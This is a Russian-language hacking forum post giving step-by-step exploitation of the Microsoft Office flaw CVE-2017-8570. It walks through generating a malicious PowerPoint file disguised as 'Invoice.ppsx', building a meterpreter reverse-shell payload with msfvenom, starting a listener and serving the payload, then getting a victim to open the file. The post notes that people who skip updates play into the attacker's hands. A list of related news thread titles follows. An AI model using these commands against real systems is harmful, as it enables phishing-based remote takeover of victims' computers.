Уязвимость Microsoft Office CVE-2017-8570

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем привет. Сегодня разберем такую уязвимость как Microsoft Office CVE 2017 8570.



Данная уязвимость позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:

https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570.



Использована она может быть на следующих версиях:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.



И так поехали:

1. Заходим по ссылке https://github.com/tezukanice/Office8570 скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

9ce514b689865b93a02dd.png

Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.



Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

0386662d61065b161b0f0.png

1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc



Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

a0bc3057535e954b8bedc.png

2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe


Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.


Запускаем слушатель:

Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"


3. Далее в терминале пишем следующую строчку

Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe


по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 
Похожие темы
Support81 Уязвимость Microsoft Office становится временной бомбой в руках киберпреступников Новости в сети 0
Admin UFOLABSNEWS Российские хакеры используют уязвимость в Microsoft OWA для сохранения доступа к почтовым ящикам после смены паролей. Новости в сети 0
Admin UFOLABSNEWS Microsoft обнаружила уязвимость в AutoGen Studio, позволяющую взламывать компьютеры через ИИ-агента. Новости в сети 0
Admin Интересно Уязвимость в Microsoft 365 Copilot позволяла красть письма и файлы одним кликом. Новости в сети 0
Admin Интересно Microsoft устранила уязвимость в SharePoint, позволяющую удалённое выполнение кода. Новости в сети 0
Admin Интересно Microsoft обнаружила критическую уязвимость в Outlook. Новости в сети 0
Admin Интересно Новая уязвимость в Microsoft Exchange Server активно эксплуатируется через специально созданные письма. Новости в сети 0
Admin Интересно Microsoft устранила критическую уязвимость в ASP.NET Core. Новости в сети 0
Admin UFOLABSNEWS Обнаружена уязвимость в Telegram Desktop, позволяющая скрытому JavaScript красть сообщения из HTML-экспортов. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют уязвимость приложения Tencent для распространения вредоносного ПО GrayRabbit. Новости в сети 0
Admin UFOLABSNEWS Nintendo закрыла необычную уязвимость, связанную с QR-кодами на Switch. Новости в сети 0
Admin UFOLABSNEWS SAP устранила критическую уязвимость в ядре системы, угрожавшую корпоративным данным. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в кошельке Alby Hub, позволяющая злоумышленникам похищать биткоины. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в N-able N-central активно эксплуатируется злоумышленниками. Новости в сети 0
Admin UFOLABSNEWS Исследователи обнаружили уязвимость в WeChat, позволяющую взламывать аккаунты через входящие звонки. Новости в сети 0
Admin UFOLABSNEWS Обнаружена уязвимость StyleSmuggler в Magento, позволяющая внедрять бэкдоры. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники атакуют роутеры MikroTik через уязвимость в SSH без аутентификации. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Super Forms угрожает безопасности серверов. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники взломали JetBrains Cadence через уязвимость в TeamCity. Новости в сети 0
Admin UFOLABSNEWS Google закрыла шестой zero-day уязвимость в Chrome за текущий год. Новости в сети 0
Admin UFOLABSNEWS Исследователь обнаружил уязвимость нулевого дня в CrowdStrike Falcon. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в коммутаторах Cisco Nexus 9000. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в плагине Elementor Pro позволяет захватывать WordPress-сайты. Новости в сети 0
Admin UFOLABSNEWS Исследователь обнаружил уязвимость FalconFlank в системе безопасности CrowdStrike Falcon. Новости в сети 0
Admin UFOLABSNEWS Хакеры активно эксплуатируют уязвимость в платформе Sangoma Switchvox. Новости в сети 0
Admin UFOLABSNEWS Уязвимость в плагине WordPress для резервного копирования подвергает миллионы сайтов риску. Новости в сети 0
Admin UFOLABSNEWS Dropbox предупреждает пользователей о взломе аккаунтов через уязвимость Lenovo. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Langflow используется для кражи ключей OpenAI и AWS. Новости в сети 0
Admin UFOLABSNEWS Уязвимость в cPanel позволяла получить root-доступ через стандартный клиентский аккаунт. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Cosmos EVM позволила злоумышленникам похитить средства с шести блокчейнов. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в плагине GiveWP для WordPress. Новости в сети 0
Admin UFOLABSNEWS Уязвимость в ownCloud использовалась для кражи ядерных данных на Филиппинах. Новости в сети 0
Admin UFOLABSNEWS Уязвимость в ownCloud привела к утечке ядерных архивов. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в cPanel, позволяющая получить полный контроль над сервером. Новости в сети 0
Admin UFOLABSNEWS Обнаружена уязвимость NemoClaw, позволяющая злоумышленникам контролировать ИИ-агентов через скрытые инструкции. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость — и что? Wiz объяснила, почему высокий CVSS часто ничего не значит. Новости в сети 0
Admin UFOLABSNEWS В PaperCut обнаружена уязвимость, активно используемая злоумышленниками. Новости в сети 0
Admin UFOLABSNEWS Обнаружена критическая уязвимость в теме Avada для WordPress. Новости в сети 0
Admin UFOLABSNEWS Уязвимость в Azure Cosmos DB позволяла получить полный доступ к базам данных. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Ruby on Rails позволяет злоумышленникам читать файлы сервера через загрузку изображений. Новости в сети 0
Admin UFOLABSNEWS Катастрофа в CI/CD. Уязвимость серверов TeamCity позволяет подменить код перед самым релизом. Новости в сети 0
Admin UFOLABSNEWS В OpenWrt обнаружена критическая уязвимость, позволяющая выполнять код от имени root. Новости в сети 0
Admin Интересно Российские хакеры используют уязвимость Zimbra для кражи электронной почты. Новости в сети 0
Admin Интересно Уязвимость в Cursor позволяет запускать вредоносный код при открытии репозитория. Новости в сети 0
Admin Интересно Уязвимость в расширении Claude for Chrome позволяет другим расширениям управлять Gmail, Docs и Calendar. Новости в сети 0
Admin UFOLABSNEWS Уязвимость GhostCommit позволяет украсть пароли через PNG-файлы. Новости в сети 0
Admin UFOLABSNEWS Palo Alto Networks обнаружила критическую уязвимость в межсетевых экранах. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Zimbra позволяет выполнять вредоносный код через письма. Новости в сети 0
Admin UFOLABSNEWS Хакеры активно эксплуатируют критическую уязвимость в Docker-образе Gitea. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники похитили 3,1 миллиона долларов, используя уязвимость Ill Bloom в криптокошельках. Новости в сети 0

Название темы